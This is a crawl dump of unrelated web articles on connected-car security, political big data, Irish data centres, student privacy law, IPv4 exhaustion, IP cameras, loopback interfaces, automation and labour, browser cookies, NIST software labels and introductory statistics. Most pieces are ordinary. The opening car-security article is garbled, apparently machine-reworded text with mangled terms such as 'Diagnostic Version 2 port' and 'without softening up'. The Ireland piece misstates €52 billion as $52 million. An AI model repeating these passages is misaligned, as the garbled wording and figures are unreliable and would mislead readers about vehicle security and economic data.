Today convicted Modern cars are using a lot of technology and it always connected with internet that makes it extremely vulnerable and easy to compromise using Malware attacks and other security flaws that presented in the IoT Devices that connected with Modern cars. Connected cars are rapidly increasing and multiple IoT devices are connected to the car that needs to communicate remotely in order to operate the users from Wifi and other drive assistance. Automotive security field involved with a lot of security risks since Modern cars are exposed a lot of vulnerability that leads to face the High-security risks as other connected devices. Major Modern Cars Security Risk Vehicle-to-Vehicle Communications is established using Wireless network that allows making two vehicle’s successful communication on road and it allows to reduce the car speed if another vehicle comes closer. In this case, Attacker could be abusing the flaw in the wireless communication technology and reduce the car speed and invaded by destructive malware and the V2V system becomes a vector, a malicious actor could create malware to infect many connected cars. Controller Area Network Backdoor Many cars are using controller area network (CAN) that using to communicates with a vehicle’s electronic control unit (ECU), which operates many subsystems such as antilock brakes, airbags, transmission, audio system, doors, and many other parts—including the engine. Modern cars are using Diagnostic Version 2 port that used to diagnose problems with Mechanics and this could be abused by CAN traffic and intercepted from the OBD port. So external OBD device could be plugged into a car as a backdoor for external commands, controlling services such as the Wi-Fi connection and unlock the door. Malware and Exploits Modern cars technology allows to connect the car with our smartphones to our cars, we add functions such as phone calls, SMS, and music and audiobooks. Recent powerful Malware and exploits could compromise the device and firmware that will lead to compromise the car devices. Car Theft and Key Fob Hacking Key fob hacking is a procedure to enable an attacker to enter the car without softening up. This system is generally used by hackers and should be possible effectively with modest equipment. In this case, attacker blocks the signal from the wireless key and lock the car and also reply the signal to compromise the car. According to McAfee Research, One variant of the attack uses a jammer to block the signal. The jammer interferes with the electromagnetic waves used to communicate with the vehicle, blocking the signal and preventing the car from locking, leaving access free to the attacker. Personal Data and Tracking Connected Cars are kept recording the more sensitive personal data about the drivers from the external devices such as hone, and can include contact details, SMS and calls history and even musical tastes that connected to the cars. These data are used by the companies, cybercriminals, and Governments to use it for various purposes such as spying and tracking the people, marketing or insurance contracts. Fake Car Data Advanced data can be adjusted and faked. By adjusting information, for example, contamination tests or execution, organizations results to increase sales Additionally, drivers could change auto insights, for example, separate set out to trick insurance agencies or future purchasers.
<urn:uuid:a2fde0c1-ffec-4562-bc59-19c56bdd0e2d>
CC-MAIN-2022-40
https://gbhackers.com/modern-cars-vulnerability/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00469.warc.gz
en
0.937421
675
2.625
3
In the coming months and over the next year, several important votes and elections will take place around the world: the presidential elections in the United States this November; the French presidential election in April/May 2017, the French legislative election next June; the German federal election next August, etc. Most of these already have campaigns underway to help sway the opinions and decisions of voting parties, which raises the question—how will the candidates of each party utilise Big Data to help give them a competitive edge? Forming an opinion based on facts Ever since the re-election of Barack Obama in 2012, it’s been clear that Big Data has become one of the major weapons in the arsenal of political marketing. Campaign managers have already demonstrated how to wield big data for voter micro-targeting, drastically improving the efficiency of fund-raising, anticipating voter demands and refining their messaging to address those needs, predictive analysis to anticipate how their candidate will perform in the near and long-term, use of social media to extract voter sentiment, etc. Data Scientists have made traditional political campaigns a thing of the past. Candidates have even gone as far as designing apps that test voters’ knowledge of pressing issues facing the country and future challenges to get them more engaged in the dialogue. At the same time, candidates’ campaigns and political debates are sparking plenty of chatter across all social networks, through which voters can engage in peer-to-peer discussions, which can also help shape their decision on which candidate for which to vote. Choosing the right leader can be a long and difficult process that often requires extensive research and filtering of information from several data sources to verify which candidate actually has the right credentials to lead the country in the right direction. Using Big Data Tools to Revolutionise Citizen Involvement The Obama administration introduced the notion of increased government transparency by opening up access to a vast amount of information in order to shed light on the government's actions. Not only are citizens now able to view information on current and upcoming federal budgets and compare them with previous budgets, but the site goes as far as listing all White House employees’ salaries; information on party donors and more. Besides the goal of having more government transparency—hopefully thereby obtaining greater citizen trust—the premise was to also encourage more citizen involvement with government. As a result of the very social and open Barrack Obama voting experience in the US, similar tactics are now being employed in France. In anticipation of the Fall right-wing primaries in France (and the left-wing primaries in January 2017), all of the parties and candidates are employing strategies to analyse voter sentiment to inspire marketing, where "the voter is a consumer, and the candidate, is the product." Moving Beyond Communications But even beyond communications with the citizens, data scientists at the White House have laid the groundwork for a new way of finding never before seen answers to social and economic problems - based on the analysis of varied data sets. From transportation and infrastructure to the fight against crime or fraud, the positive results achieved thanks to digital tools are helping political leaders eradicate various societal challenges. Additionally, at a time when polling institutes' projections are increasingly questioned (as was the case with the recent British vote on Brexit), Big Data can provide a more precise and comprehensive view of likely outcomes without representative samples. A project done by Wei Wang of the Columbia University statistics department and Sharad Goel and David Rothschild of Microsoft Research, showed that Big Data tools hold promise not only for election forecasting, but also for measuring public opinion on a broad range of social, economic and cultural issues. As a growing number of voters are calling for increased government transparency and a new approach to politics, Big Data can help provide more direct access to citizen sentiment so that government officials can be more in tune with citizens' demands. Isabelle Nuage, Director of Product Marketing for Big Data at Talend (opens in new tab) Image source: Shutterstock/Carlos Amarillo
<urn:uuid:a89eb80b-4a77-40a8-a814-40ee5125733e>
CC-MAIN-2022-40
https://www.itproportal.com/features/big-data-is-revolutionising-political-campaigning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00469.warc.gz
en
0.947709
810
2.859375
3
In this edition of Voices of the Industry, Garry Connolly, founder of Host in Ireland, explains how and why digital infrastructure coming from Ireland plays a unique role around the world. We are in the midst of the Fourth Industrial Revolution. Data is the engine of this revolution, much like steam was to the first Industrial Revolution nearly 300 years ago. Data and digital tools are enabling new types of innovation, communication and creativity. In fact, every person in the world generated 1.7 megabytes of data per second in 2020. Much still seems to be misunderstood, however, about the “centres” where that “data” is housed. To the general public, data centres are sometimes thought of as secretive and austere grey “boxes” that are disconnected from their local communities. There is a misperception they add little value to the communities they reside in despite the economic benefits they provide. The reality is data centres do not run in isolation from society, they are there because of it. From Floppy to Fibre Ireland has had a six decade relationship with “data” and a decade plus relationship with the “centres.” From mainframes in the 1960s to leading the world in software exports via floppy disk in the 1990s to data exports via data centres and fibre today. Irish companies have a long history supporting and partnering with global multinational organisations. Through this experience, the knowledge acquired by Irish companies has helped Ireland evolve as a leading data hosting nation, as well as a supplier of skills and services needed for data’s global expansion. IBEC’s Cloud Infrastructure Ireland group also estimates the technology sector, which is underpinned by the data centre industry, contributes €52 billion ($52 million) to the economy and employs approximately 150,000 people. That translates to a real economic benefit for the Irish economy. According to Enterprise Ireland, €2 billion ($2 billion) of global Irish sales exports can be attributed to data centres. What has made Ireland an intrinsic home to digital infrastructure and Irish companies so successful? There are common threads that run throughout companies who work from and within Ireland no matter how big or small they are – Ingenuity, Relentlessness, Integrity, Strength and History – I.R.I.S.H. But being I.R.I.S.H. is not about nationalities, but rather how and why digital infrastructure coming from Ireland – with global and Irish companies – plays a unique role around the world. An ecosystem at its most basic biological definition consists of organisms and the physical environment with which they interact. A business ecosystem is typically defined as a network of organisations involved in the creation and delivery of products and services. For an ecosystem to flourish, cooperation and competition – or “co-opetition” – needs to exist. A diverse group of partners all interact and collaborate to bring the most innovative ideas and products to the forefront and raise the playing field for the industry as a whole. Although many of our Host in Ireland partners are competitors, they have historically come together as a collective to promote the capabilities of Ireland as a centre of data excellence. Today, many of our partners are location agnostic and building robust businesses from Ireland across Europe, the Middle East, and making inroads to Africa and the rest of the world. Given the fact the data centre market opportunity in Europe is expected to grow to $66B by 2030, and the domestic Irish market represents 10% of that opportunity, the focus is now just as heavily focused on promoting Irish companies in the global data centre market. What Comes Next The chief economists in the United Nations jointly identified climate change and technological revolution as two of the five “megatrends” that will shape our world over the course of this century. The socioeconomic challenges of the last few years have become a springboard for digitalisation and changed our expectations of how we interact with technology. Running in parallel, the decarbonisation of our societies, including the electrical grid, is an increasingly urgent issue. The place where digitalisation and decarbonisation intersect is none other than the data centre. There’s no doubt as the datasphere continues to grow, Tier 1 hosting locations, including Ireland, are facing tough challenges ahead. Power availability and sustainability are at the heart of every discussion. Yet, as Albert Einstein once said, ““In the midst of every crisis, lies great opportunity.” Despite short term discomfort, in the long run there is a tremendous opportunity to innovate and change the way we do things. Scrutiny on sustainability will drive a meticulous approach to creating sustainable solutions on everything from equipment manufacturing to construction to operations. The positive economic impact to global and individual economies can not be underestimated as it is likely to continue for the foreseeable future. Digitalisation is here to stay and decarbonisation is a must for the future of our planet. It’s time once again for the data centre industry to be brave, creative and relentless to meet the challenges and seize opportunities ahead of it. Garry Connolly is founder of Host in Ireland, a global initiative created to increase awareness for how and why digital infrastructure coming from Ireland – with global and Irish companies – plays a unique role around the world. Learn more in the Irish Data Centre Ecosystem Report.
<urn:uuid:19bfdce9-28cf-436f-8e4e-f37c370600cb>
CC-MAIN-2022-40
https://datacenterfrontier.com/the-unique-role-of-digital-infrastructure-coming-from-ireland/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00469.warc.gz
en
0.944768
1,104
2.78125
3
The Center for Democracy & Technology, along with the law firm BakerHostetler, developed a state-by-state compendium of privacy laws relating to the collection, use, and sharing of student data. While the practice of collecting data about students is not new–schools have been gathering and reporting test scores, grades, retention records, and the like for years–the means by which student data is collected, the types of data collected, and the entities that ultimately have access to this data have expanded dramatically, the report explains. In order to understand the laws on a state level, as well as in a regional and national context, let’s look at each state and regional individually, using the United States Census Bureau’s four statistical regions–the Northeast, Midwest, South, and West. Alabama, Arkansas, Delaware, Florida, Georgia, Kentucky, Louisiana, Maryland, Mississippi, North Carolina, Oklahoma, South Carolina, Tennessee, Texas, Virginia, Washington, D.C., West Virginia Alaska, Arizona, California, Colorado, Hawaii, Idaho, Montana, Nevada, New Mexico, Oregon, Utah, Washington, Wyoming Illinois, Indiana, Iowa, Kansas, Michigan, Minnesota, Missouri, Nebraska, North Dakota, Ohio, South Dakota, Wisconsin Connecticut, Maine, Massachusetts, New Hampshire, New Jersey, New York, Pennsylvania, Rhode Island, Vermont
<urn:uuid:ebcfa76f-e67b-48ee-8ff0-6d7089741453>
CC-MAIN-2022-40
https://origin.meritalk.com/articles/state-laws-govern-student-data-privacy/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00469.warc.gz
en
0.869534
285
2.96875
3
Like the monotonous droning sound of jungle drums so has the repetitive and continual predictions about the exhaustion of world’s supply of public IPv4 address. We have been hearing about the impending scarcity of IPv4 addresses for so long that we don’t hear the calls to action. Today’s announcement by The American Registry for Internet Numbers (ARIN) that they have reached IPv4 exhaustion and has now signaled the alarm. Organizations can no longer ignore what the future of the IPv4 Internet may be like, and instead, seize ownership of their own destiny and deploy IPv6. When the Internet Protocol (IP) was being developed in the 1970s the number of endpoints was quite small. The working being done at Defense Advanced Research Projects Agency (DARPA) was done with a small set of university research and government systems. The 32-bit addresses used with IPv4 are hierarchically allocated (like phone numbers) and used quad dotted decimal notation for human readability. At the time the Internet Protocol was developed, no one could have possibly predicted the impending popularity of the Internet. Addressing and routing go hand-in-hand and the inefficiency of allocation of IPv4 addresses eventually led to a worldwide shortage of addresses. The IETF Address Lifetime Expectations (ALE) Working Group anticipated back this trend back in the mid-1990s that this date would come. With the introduction of Classless Interdomain Routing (CIDR) and Network Address Translation (NAT) in the mid-1990s, IPv4 has been on extended life-support for almost two decades. For almost a decade the community has been watching Geoff Huston’s IPv4 Address Report as a guide to anticipate when IPv4 exhaustion would occur. IANA and the RIRs The Internet Assigned Number Authority (IANA) depleted their free pool of IPv4 address space on February 3, 2011. On that date, all the available IPv4 addresses had been allocated to the five Regional Internet Registries (RIRs) around the world. Each RIR has had to independently manage their own supply of IPv4 addresses resources. However, each RIR has had a different strategy for their exhaustion stage/phase schedule. Each RIR has had a different policy for how they are effectively managing the allocation of their limited IPv4 resources. The Asia-Pacific Network Information Centre (APNIC) has had an extremely fast-growing Internet population and took a particularly aggressive stance on IPv4 address allocation and prioritizing IPv6 deployment. Their supply of IPv4 addresses ran out on April 15, 2011. APNIC has been giving guidance to their member organizations for years on IPv4 address exhaustion and has a page on what is happening in the post-exhaustion phase. The next RIR to run out of IPv4 addresses was Réseaux IP Européens Network Coordination Centre (RIPE NCC). Their supply of public IPv4 addresses passed their final /8 equivalent on September 14, 2012. RIPE NCC’s policies state that their members can make a one-time request for a /22 allocation and no new Provider Independent (PI) allocations will be made. The Latin America and Caribbean Network Information Centre (LACNIC) was the next RIR to exhaust their supply of IPv4 addresses. This occurred on June 10, 2014 as a result of their growing Internet community. Their member organization continue to grow their Internet access and LACNIC has initiatives around helping their members embark on the IPv6 path. The American Registry for Internet Numbers (ARIN) is the Regional Internet Registry (RIR) for the U.S., Canada, and Caribbean and North Atlantic islands. North America has had a large Internet-connected population, but as more systems and organizations have connected to the Internet, ARIN has processed numerous requests for public IPv4 addresses. ARIN entered Phase 4 of their IPv4 Exhaustion plan on April 23, 2014 and has been operating under their Phase 4 policies since then. During Phase 4, any new request for IPv4 address space is reviewed by the IPv4 Review Team queue where they are reviewed in a first-come first-served basis. ARIN has been managing the IPv4 Request Pipeline as their IPv4 stockpile dwindles. The current IPv4 address inventory is listed on ARIN’s IPv4 depletion page. ARIN has an IPv4 Depletion blog where you can find the latest information on this topic. Now that IPv4 exhaustion has occurred for ARIN members, the rules for future IPv4 allocations will change. ARIN members can make address requests, but ARIN is likely to not have address supply to meet those requests. Applicants will either be given the choice to accept a smaller block than they requested or get their name added to a waiting list. Applicants can also withdraw their request and chose to acquire their IPv4 addresses from another source. This ARIN web page provides information on the waiting list for unmet IPv4 address requests. These guidelines are published in the Number Resource Policy Manual (NRPM) Section 4.1.8. The African Network Information Centre (AfriNIC) has a growing Internet population too, but they have not reached exhaustion of their IPv4 address supply. As more of their communities come online their usage of their remaining IPv4 addresses are likely to accelerate. Using both IPv4 and IPv6 in parallel dual-protocol mode gives your organization the best position to be able to communicate with the broadest Internet community. Deploying IPv6 is a long-term strategy, but enterprise organizations must start that process immediately. However, even if organizations aggressively deploy IPv6, they will still experience a short-term IPv4 address shortage. Still, organizations may be forced to purchase/lease public IPv4 addresses and now those IPv4 addresses will only become more expensive. If you haven’t embarked on the IPv6 path yet, there is no time like the present to define your organization’s IPv6 strategy. Ed Horley, Practice Manager – Cloud Solutions and the Practice Lead – IPv6 at Groupware Technology, and Infoblox IPv6 Center of Excellence member has a great blog with some solid guidance for enterprises on how to get started with IPv6. Following are his first phases of an IPv6 plan. - Kick off 2015 with the first phase of your IPv6 plan: Assessment - The second phase of your IPv6 adoption plan: Training - The Third Phase of Your IPv6 Adoption Plan: Planning and Design - The fourth phase of your IPv6 adoption plan: Proof of Concept
<urn:uuid:815c9dd8-d1a0-4472-9747-f0637a88c21d>
CC-MAIN-2022-40
https://blogs.infoblox.com/ipv6-coe/north-americas-ipv4-address-shortage/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00669.warc.gz
en
0.952137
1,390
2.59375
3
One common misconception is that IP cameras can only work if they’re connected to the internet. It’s a valid assumption to make since after all, IP does stand for internet protocol. However, IP cameras can still work without internet connection. Let’s go over how you can install an IP system without internet and their limitations. Setting Up IP Cameras Without Internet As stated in our basic IP CCTV systems guide, IP systems rely on a connected network to do all of their data transmission. However, this connected network doesn’t necessarily need to be the internet. If you look on your router, you will see something called LAN and WAN. LAN stands for local area network whereas WAN stands for wide area network. The difference between these 2 networks is that LAN is confined to a smaller area, like a building or home, while WAN is everything outside of this area- so basically the entire internet. An IP system setup without internet connection will pretty much look like a regular IP system with internet. You would still be able to install an IP system using PoE and have the option of using or not using an NVR. The only difference is that all of your devices will be connected through the LAN but not the WAN. However, remember that if you want to use IP cameras, you will still need a router that is capable of providing a LAN for your devices to connect to. Keep in mind that using IP cameras without internet connection will mean that you will lose the benefit of remote viewing. While the IP system will be connected to each other through the LAN, they will not be connected to the WAN so there will be no way to access the cameras through the internet. However, you will still be able to store and view your footage on-site through the LAN.
<urn:uuid:865a5d38-e0e9-4704-82c5-5c8238873030>
CC-MAIN-2022-40
https://www.2mcctv.com/can-ip-cameras-work-without-internet/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00669.warc.gz
en
0.941732
372
2.5625
3
A loopback interface is a logical virtual interface created on a router simulating a real interface. This can be used to connect to management services such as Web (HTTPS), SNMP, ACS (TR069), Syslog or SSH as well as authentication services such as TACACS+ or RADIUS instead of using a LAN IP. For authentication function, using the dedicated loopback address will reduce the administrative overhead since there is no need to add multiple router IP addresses into the AAA server. In addition security will be enhanced by isolating authentication from the user network. Using a loopback address means the virtual interface is always up, especially when the CPE has multiple WAN interfaces. For example, if BGP connected on WAN1 is down, management and AAA traffic can be routed to the defined loopback interface through the VPN tunnel connected on WAN2. Another benefit is that the loopback IP can be an IP address (with a 32-bit mask). This means that the interface is not assigned to any LAN port, which improves security and saves a lot of IP address space. We can imagine that if we assign 24-bit mask IPs to many managed routers, there will be insufficient network IPs. 1. specify a LAN interface and give it an IP addr. with 32-bit mask. 2. Go to Management setup page and tick Enable Loopback Interface. Was this helpful? Sorry about that. Contact Support if you need further assistance, or leave us some comments below to help us improve.
<urn:uuid:ac1d5c41-57f9-453d-bc34-16e39eb16fcb>
CC-MAIN-2022-40
https://www.draytek.com/support/knowledge-base/10914
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00669.warc.gz
en
0.914881
328
2.765625
3
Throughout the Industrial Revolution, laborers with a wide range of manual skills helped give rise to many of the innovations and technologies that were used in workplaces throughout the 20th-century. Some, such as Henry Ford’s assembly line introduced in 1913, for example, are still used today. Yet, as we look to the future, we can already see signs of how the introduction of artificial intelligence (AI) and other intelligent machines might cause additional shifts in labor through the process of automation. Several decades ago, when the internet was still a fledgling technology, the notion of robots and intelligent machines working alongside humans was still confined within the realm of science-fiction. Today, that notion has become scientific fact. Furthermore, most researchers and analysts agree that as intelligent machines and automation technologies continue advancing, almost every global industry — and the human laborers who comprise them — will be affected. To know the future, look to the present If we wish to understand how the future of automation and intelligent machines (i.e., robots) will impact labor markets, we need only look at how it is doing so presently. Robots are already being employed in ways that, up until just a few short years ago, many of us would have never thought possible. For instance, many companies and organizations within the healthcare industry have transitioned a bulk of their administrative and patient profiling tasks from human employees to automated, intelligent systems fueled by AI and machine learning (ML) technology. In other labor sectors that have traditionally relied on the physical skills of manual workers, robots and machines have steadily been replacing human labor for decades, and automation in these spaces is now rapidly compounding. According to the International Federation of Robotics, US manufacturing firms introduced an average of one robot worker per 1,000 human workers between 1997 and 2003. By comparison, European firms introduced roughly 1.6 robots per 1,000 human workers during that same period. More recently, however, in the industrial manufacturing sector alone, robot density per employee doubled globally between 2015 and 2021 from approximately 66 per 10,000 human workers to 126. This tells us that the hypothesized “Automation Revolution” may occur much sooner than we think; possibly in as little as 15 years. As such, human employees may soon find themselves needing to possess different skill sets in order to remain competitive and relevant in labor markets dominated by automated, intelligent machines. Shifts in labor will cause shifts in labor skills As automation continues to compound over the coming years, replacing a growing number of jobs once held by skilled manual laborers, human workers will be forced to either expand their existing skill sets or become capable at new ones. According to one report from McKinsey, “The need for some skills, such as technological as well as social and emotional skills, will rise, even as the demand for others, including physical and manual skills, will fall.” Subsequently, this will place pressure on businesses and companies to reconsider the ways in which work and labor is structured and conducted within their organizations. Coinciding with McKinsey’s report is another from MIT, which revealed that automation and robots may replace a further 2 million physical human laborers in manufacturing by 2025. However, this poses an issue in regard to social inequality. As Karishma Ramkarran, staff reporter for Scientific Survey says, “…those who are most affected tend to be low-income and people of color. Minimum wage workers often have little to no social mobility or financial security that would enable them to pursue a career towards a more “skilled” profession that requires a certain degree of education or training.” These reports show us that the compounding rate of automation in manufacturing is directly correlated with the income inequality of manual workers. Many of these laborers do not have the ability to access education that could help them learn or train social and emotional skills, leaving them without many other options for employment. As a result, in the next 15 years, there will likely be increased pressure placed on social, labor, and political leaders to help retrain millions of human workers to re-enter a workforce saturated with automation and intelligent machines. Both the speed and extent to which automation is occurring in the labor market, while daunting for some, is not unprecedented. Yet as automation and intelligent machines continue being integrated into an increasing number of labor market sectors, many people (particularly the workers whose jobs are replaced by these technologies) will look to political leaders and legislators who hold the influence to shape future labor market policies. Despite the influence those policy-makers may have, this new paradigm shift isn’t arising — nor will it continue to — within a vacuum. Both politically and culturally, people will have to accept intelligent machines and adapt accordingly just as they have done with other technological innovations in the past, as we witnessed, for example, with the advent of smartphones. Technology has historically outpaced legislation and will continue doing so throughout the emerging Automation Revolution. While public policy will ultimately hold some degree of influence over the extent of automation’s impact on labor markets, it will only come after private institutions, organizations, and our societies learn how to evolve with increased automation in labor and adapt to it.
<urn:uuid:ade524ba-18a4-4766-9c72-337e7a1af40d>
CC-MAIN-2022-40
https://digitalcxo.com/article/the-automation-revolution-and-the-shift-in-labor/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00669.warc.gz
en
0.959864
1,062
3.28125
3
As an avid internet surfer, you’ve most likely heard of cookies. No, we’re not talking about the ones filled with chocolate chips. We’re talking about the ones that allow you to log in to your favorite websites. Cookies may impact your online security, so check out these tips to manage them and keep your online accounts safe. What Are Cookies in Browsers? Ever wonder how a website saves the items you placed in your shopping cart last week, even though you closed the tab before making the purchase? This is made possible by cookies. According to the Federal Trade Commission, a cookie is information saved by your web browser. When you visit a website, the site may place a cookie on your web browser so it can recognize your device in the future. If you return to that site later, it can read that cookie to remember you from your last visit, keeping track of your activities over time.1 First-party vs. Third-party Cookies Cookies come in either the first-party or third-party variety. There’s no difference between the two in how they function, but rather in where and how you encountered them. First-party cookies belong to sites you visited first-hand in your browser. Third-party cookies, or “tracking cookies,” generally come from third-party advertising websites. Magic Cookies vs. HTTP Cookies Although cookies generally function the same, there are technically two different types of cookies. Magic cookies refer to packets of information that are sent and received without changes. Historically, this would be used to log in to a computer database system, such as an internal business network. This concept predates the modern cookie we use today. HTTP cookies are a repurposed version of the magic cookie built for internet browsing and managing online experiences. HTTP cookies help web developers give you more personalized, convenient website experiences. They allow sites to remember you, your website logins, and shopping carts so you can pick back up where you left off from your last visit. However, cybercriminals can manipulate HTTP cookies to spy on your online activity and steal your personal information. What Is Cookie Hijacking? Cookie hijacking (also known as session hijacking) is typically initiated when a cybercriminal sends you a fake login page. If you click the fake link, the thief can steal the cookie and capture anything you type while on the fraudulent website. Like a phishing attack, cookie hijacking allows a cybercriminal to steal personal information like usernames, passwords, and other important data held within the cookie. If you enter your information while on the fake website, the criminal can then put that cookie in their browser and impersonate you online. They may even change your credentials, locking you out of your account. Sometimes, criminals initiate cookie hijacking attacks without a fake link. If you’re browsing on an unsecured, public Wi-Fi connection, hackers can easily steal your data that’s traveling through the connection. This can happen even if the site is secure and your username and password are encrypted. Can Cookies Compromise Your Browser Security? Tips for a More Secure Browsing Experience Preventing cookie hijacking attacks can allow you to browse the internet with greater peace of mind. Follow these tips to not only safeguard your personal information but to also enhance your browsing experience: Clean out the cookie jar Make it a habit to clear your cookie cache regularly to prevent cookie overload, which could slow your search speeds. Also, almost every browser has the option to enable/disable cookies on your computer. So if you don’t want them at all, your browser’s support section can walk you through how to disable them. Turn off autofill features Although it’s convenient to not have to re-type your credentials into a website you frequently visit, autofill features could make it easier for a criminal to extract your data with cookie hijacking. Plus, autofill is risky if your physical device falls into the wrong hands. To browse more securely without having to constantly reenter your passwords, use a password manager like McAfee True Key. True Key makes it so you only have to remember one master password, and it encrypts the rest in a vault protected by one of the most secure encryption algorithms available. Opt into multi-factor authentication Strong, unique passwords for each of your accounts, updated regularly, offer ample protection against hackers. Multi-factor authentication (MFA) adds yet another layer of security by double-checking your identity beyond your username and password, usually with a texted or emailed code. When your accounts offer MFA, always opt in. Connect to a virtual private network (VPN) Criminals can hijack your cookies if you’re browsing on an unsecured, public Wi-Fi connection. To prevent a criminal from swiping your data, use a virtual private network (VPN), a service that protects your data and privacy online. A VPN creates an encrypted tunnel that makes you anonymous by masking your IP address while connecting to public Wi-Fi hotspots. This is a great way to shield your information from online spies while you’re banking, shopping, or handling any kind of sensitive information online. Use antivirus software McAfee LiveSafe™ is an antivirus solution that protects your computer and mobile devices from suspicious web cookies by: - Allowing you to keep your online passwords (which are often stored in cookies) in one secure location. - Warning you of suspicious links, keeping potentially harmful cookies off your device. - Protecting you against viruses and malware. - Blocking spam and emails that could lead to sites containing dangerous cookies. Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.
<urn:uuid:bf01e220-ac77-464d-b375-d4f1f8b4a3cd>
CC-MAIN-2022-40
https://www.mcafee.com/blogs/privacy-identity-protection/what-are-browser-cookies-and-how-do-i-manage-them/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00669.warc.gz
en
0.902894
1,300
3.28125
3
The effort aims to create a user-friendly label to educate consumers about their purchases. The National Institute of Standards and Technology is looking for input on new cybersecurity guidance for consumer software in a bid to increase the public’s safety and awareness. NIST officials want feedback on labeling criteria for certain software products to ensure the general public find the labels user-friendly. “We are establishing criteria for a label that will be helpful to consumers,” Michael Ogata, a NIST computer scientist and co-author of the draft document, said in the press release. “The goal is to raise consumers’ awareness about the various security needs they might have and to help them make informed choices about the software they purchase and use.” NIST’s criteria initiative is a result of an executive order President Joe Biden signed in May following multiple widespread ransomware attacks. Pursuant to the order, NIST is required to develop new operating procedures that can be used to evaluate software security and educate consumers about the technology they purchase. The criteria will serve as the foundational technical information requirements for labeling consumer software products. Some of the information set to be included in the labels are “attestations,” which are claims about a specific software’s security features. These claims range from best practices, a description of the software systems, known vulnerabilities, and data encryption and protection statuses. “As a complement to the labeling approach, a robust consumer education program should be developed to increase label recognition and to provide transparency,” Ogata said. “Consumers should have access to online information including what the label means and does not mean, so that they can avoid potential misinterpretations.” NIST itself does not create the labels and has yet to determine which entity will. Labels won’t be a requirement on all software products; rather, the executive order stipulates the labels will be voluntary and at the discretion of the marketplace to determine which organizations should use cybersecurity labels on software products.
<urn:uuid:f65f5e2b-0029-4c22-8037-487370f1d514>
CC-MAIN-2022-40
https://www.nextgov.com/cybersecurity/2021/11/nist-seeks-feedback-cybersecurity-labels-software/186773/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00669.warc.gz
en
0.927822
417
2.53125
3
Crash Course is like a quick recap for any course as it will save your time and teach you the whole syllabus in a short span of time in an easy manner. The crash course is a great support to the students who have to cover a lot of syllabus in a short period and lets students learn smartly and fastly. This blog is the guide for students who want to study statistics in a short period. Crash Course in Statistics is the beginner's training of the primary methods of statistics. It will help you in understanding statistics in a better way and clear all your queries. The key statistical methods include; - Basics of probability, - An introduction to statistical inference, - Types of statistics, - Nonparametric statistics At the end of the blog, a questionaire is provided that help readers to analyze themselves about their basic knowledge of statistics. For students who are new to statistics and people who need to understand statistics, this "crash course" can prove to be very beneficial. 1. Basics of Probability A probability is a number that indicates the opportunity or probability of a specific happening. Probabilities can be communicated as extents that range from 0 to 1, and they can likewise be communicated as rates going from 0% to 100%. A probability of 0 demonstrates that there is zero chance that a specific occasion will happen, though a probability of 1 shows that an occasion is sure to happen. A probability of 0.45 or 45% demonstrates that there are 45 possibilities out of 100 of the occasion happening. (Must read: Introduction to Conditional Probability) Common Terms Under Probability Sample Space or S- The probability of the sample space is always 1. It sets all possible elementary results of a trial and if the trial comprises flipping a coin two times, the sample space is S = (h, h),(h, t),(t, h),(t, t). (Also read: Importance of Statistics and Probability in Data Science) 2. Introduction to Statistical Inference Statistical inference is the way towards utilizing information examination to make determinations about a populace or cycle past the current information. Inferential statistical examination deduces the properties of a populace by testing theories and inferring gauges. For instance, you may review a portrayal of individuals in a district and, utilizing statistical principles including simulation and probability theory, make certain inferences dependent on that example. (Also read: Statistical Data Analysis) In simple words, we can assume that statistical inference is used to make comments about a community based upon data from a sample. Basic Terms Under Statistical Inference Measurement error is sometimes called observational error. It is the difference between a measured quantity and its true value. It comprises random errors which are normally occurring errors that are to be predicted with any experiment and systematic errors which are induced by a miscalibrated device that influences all measurements. (Recommended blog: Types of Statistical Analysis) Reliability is a proportion of the steadiness or consistency of grades. You can moreover consider it as the capacity for a test or exploration discoveries to be repeatable. For instance, a clinical thermometer is a dependable device that would gauge the right temperature each time it is utilized. Similarly, a dependable number related test will precisely quantify numerical information for each understudy who takes it and solid exploration discoveries can be recreated again and again. Obviously, it's not exactly as basic as saying you might suspect a test is reliable and there are numerous reliable tools you can use to gauge reliability. Validity is a crucial element of choosing a survey instrument. In simple words, we can say that it is simply a test or instrument that accurately measures what it’s supposed to do. In research, there are three ways to approach validity which are content validity, construct validity, and criterion-related validity. There are two types of data: numerical data and categorical data. Now, if you are thinking where is quantitative data? Then let us make it clear that numerical data is also known as quantitative data. Numerical data imply a measurement, like a person’s height, weight, or IQ. It is divided into two parts: discrete and continuous. Discrete data- It is the data that can be counted. The list of logical values may be fixed or you can call it finite or it might go from 0, 1, 2, on to infinity. Continuous data- It is just the opposite of discrete, that is it is infinite or you can say that their possible values cannot be figured. It can only be interpreted using intervals on the real number line. 3. Types of Statistics There are two types of statistics: descriptive and inferential statistics and here we will read in detail about these two. Descriptive statistics is a simple way to define our data. It helps in portraying and comprehending the features of a particular informational collection by giving short synopsis about the example and proportions of the information. The most perceived types of descriptive statistics are measures of centre: the mean, median, and mode, which are utilized at practically all degrees of math and measurements. Thus, people use descriptive statistics to repurpose hard-to-understand quantitative understandings across a huge data set into bite-sized explanations. There are two categories under this, first 'The measure of central tendency', which is used to demonstrate the centre point or certain significance of a sample set or data set. Next is 'The measure of variability', which is used to describe variability in a sample or community. 